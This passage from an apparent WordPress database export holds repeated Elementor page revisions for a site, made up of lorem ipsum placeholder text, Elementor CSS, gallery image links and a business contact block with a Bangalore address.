.elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n		[wpforms id=\"1527\" title=\"false\" description=\"false\"]		\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-07 10:18:27','2022-10-07 04:48:27','',1373,'https://gopalak.in/?p=1535',0,'revision','',0),(1536,1,'2022-10-07 10:18:27','2022-10-07 04:48:27','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n		[wpforms id=\"1527\" title=\"false\" description=\"false\"]		\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-07 10:18:27','2022-10-07 04:48:27','',1373,'https://gopalak.in/?p=1536',0,'revision','',0),(1537,1,'2022-10-07 10:18:28','2022-10-07 04:48:28','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-07 10:18:28','2022-10-07 04:48:28','',1373,'https://gopalak.in/?p=1537',0,'revision','',0),(1539,1,'2022-10-07 10:32:43','2022-10-07 05:02:43','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-07 10:32:43','2022-10-07 05:02:43','',1373,'https://gopalak.in/?p=1539',0,'revision','',0),(1540,1,'2022-10-07 10:32:43','2022-10-07 05:02:43','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading 